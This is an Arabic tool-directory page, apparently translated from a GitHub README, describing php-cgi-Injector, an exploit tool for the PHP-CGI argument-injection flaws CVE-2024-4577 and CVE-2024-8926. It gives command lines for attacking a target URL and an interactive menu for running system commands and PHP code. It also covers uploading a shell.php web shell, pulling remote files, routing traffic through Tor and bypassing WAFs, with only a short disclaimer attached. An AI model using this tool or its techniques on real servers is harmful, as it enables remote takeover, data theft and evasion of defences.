Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
php-cgi-Injector — أداة اختبار اختراق أمني لـ CVE-2024-4577 و CVE-2024-8926 | Kitploit
أدوات/GitHubGitHub/night-have-dreams/php-cgi-injector
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقالقيادة والسيطرة
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

أداة اختبار اختراق أمني لـ CVE-2024-4577 و CVE-2024-8926

عرض المستودع
492منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PHP-CGI Injector

🚀 أداة استغلال الثغرات CVE-2024-4577 & CVE-2024-8926

أداة اختبار آلية لثغرة حقن المعاملات في PHP-CGI، تدعم CVE-2024-4577 و CVE-2024-8926، وتتيح عمليات تنفيذ الأوامر، رفع الملفات، تنزيلها وغيرها.


📌 مقدمة

يمكن استخدام هذه الأداة لاختبار ثغرات حقن المعاملات في بيئة PHP-CGI، وتوفر:

  • ✅ واجهة طرفية رائعة مع تأثيرات متحركة
  • ✅ فحص الثغرات بشكل تلقائي
  • ✅ أوضاع هجوم متعددة (Shell، تنفيذ كود PHP، رفع/تنزيل ملفات)
  • ✅ مجموعات حمولات (Payloads) افتراضية ومخصصة
  • ✅ وضع إخفاء حركة المرور عبر Tor
  • ✅ وحدات تجاوز WAF متعددة
  • ✅ تحويل تلقائي لتشفير المخرجات
  • ✅ وضع استغلال إجباري (حتى لو لم يتم اكتشاف الثغرة)
  • ❌ لا يدعم تحضير القهوة، لكنه يدعم تحميص جدران الحماية (WAF).
  • ❌ لا يدعم كتابة التقارير، أو مغازلة الفتيات، أو النجاح في الدراسات العليا.
  • ❌ لا يدعم الهندسة الاجتماعية، عليك مواجهة البشر بنفسك.

📜 إخلاء المسؤولية

هذه الأداة مخصصة للاختبارات المشروعة والأغراض الأكاديمية فقط، يُحظر استخدامها على أنظمة غير مصرح بها!

⚠️ الاستخدام غير القانوني يعرضك للمسؤولية القانونية!

هذه الأداة مخصصة فقط لـ:

  • 🔹 اختبارات الاختراق للفرق الحمراء في المؤسسات
  • 🔹 أبحاث أمنية في مسابقات CTF
  • 🔹 التعلم الأمني الشخصي
  • 🔹 اختبارات أمنية مرخصة قانونياً

📥 تثبيت المتطلبات

تعتمد هذه الأداة على حزم Python التالية، يرجى تثبيتها أولاً:

root@kitploit:~
pip install -r requirements.txt

أو التثبيت اليدوي:

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ طريقة الاستخدام

📌 الاستخدام الأساسي

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

أمثلة:

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 خيارات المعاملات


📌 وضع التشغيل

عندما يجد السكريبت ثغرة، يعرض قائمة:

root@kitploit:~
╭────────────  قائمة وضع الاستغلال  ────────────╮
│ الهدف الحالي: http://example.com/              │
│ نقطة الحقن الحالية: /php-cgi/php-cgi.exe       │
│ رقم الثغرة: CVE-2024-4577                       │
╰─────────────────────────────────────────────────╯
1) 🧪 وضع Shell
2) 🛠️ وضع PHP مخصص
3) 📤 رفع ملف
4) 📥 تنزيل ملف
5) 🎯 تبديل الهدف
6) ⚙️ إعدادات المعاملات
7) ❌ خروج
>>

📌 شرح الأوضاع

1️⃣ وضع Shell

تنفيذ أوامر النظام:

root@kitploit:~
shell> whoami

📂 حفظ المخرجات

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ وضع PHP المخصص

تنفيذ كود PHP مخصص:

root@kitploit:~
phpinfo();
EOF

📂 حفظ المخرجات

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ رفع ملف

root@kitploit:~
مسار الملف المحلي: C:\test\shell.php
المسار الكامل للهدف:
[*] تم تعيين مسار الرفع تلقائياً إلى: C:/xampp/htdocs/shell.php

📂 تحديد المسار يدوياً

root@kitploit:~
المسار الكامل للهدف: C:\xampp\php\shell.php

4️⃣ تنزيل ملف

root@kitploit:~
مسار الملف البعيد: C:\xampp\htdocs\index.php

📂 يُحفظ الملف في download/، وإذا كان موجوداً، يُضاف رقم تلقائي

root@kitploit:~
[*] تم تنزيل الملف، محفوظ في download/index.php

5️⃣ تبديل الهدف

root@kitploit:~
أدخل عنوان الهدف الجديد: http://newtarget.com

🔹 سيتم إعادة اختبار الثغرة


6️⃣ تبديل المعاملات

root@kitploit:~
[⚙️ قائمة إعدادات مرحلة الاستغلال]

1) تبديل الحمولة (Payload)        1
2) وحدة التجاوز (Bypass)          غير محدد
3) مهلة الانتظار (Timeout)        10 ثوانٍ
4) تأخير الطلب (Delay)            0 ثوانٍ
5) التسجيل التلقائي (Log)        مغلق
6) الوضع المفصل (Verbose)        مغلق
7) التأثيرات المتحركة (Effects)   مفعل
8) الاستغلال الإجباري (Force)    مغلق
9) حفظ والعودة إلى قائمة الاستغلال

📌 وحدات تجاوز WAF

توفر الاستراتيجيات التالية للتجاوز:

  • تشويه مسار CGI
  • إضافة أحرف غير صالحة قبل وبعد الحمولة
  • استبدال php://input بصيغ أخرى
  • إضافة رؤوس HTTP محددة أو عشوائية
  • تشويش محتوى POST
  • خلط ترتيب الحمولة عشوائياً
  • سكريبت تجاوز مخصص، راجع التنسيق في tamper_example_template.txt
تنزيل الأداة
المعاملالوصفمثال
-u أو --urlتحديد عنوان الهدف-u http://example.com
--timeout secتعيين مهلة الطلب (0 للا نهائي)--timeout 30
--logتسجيل أوامر shell تلقائياً--log
--payloadتحديد أو تخصيص مجموعة الحمولات--payload 2
--torإرسال الطلبات عبر Tor--tor
--verboseعرض معلومات مفصلة--verbose
--bypassتفعيل وضع تجاوز WAF--bypass
--forceالدخول القسري لوضع الاستغلال--force
--cgipoint PATHSتحديد مسارات CGI محددة للاختبار--cgipoint /path
--delay secتأخير بالثواني بين الطلبات--delay 1.5
--no-effectsإيقاف جميع التأثيرات المتحركة والتأخير--no-effects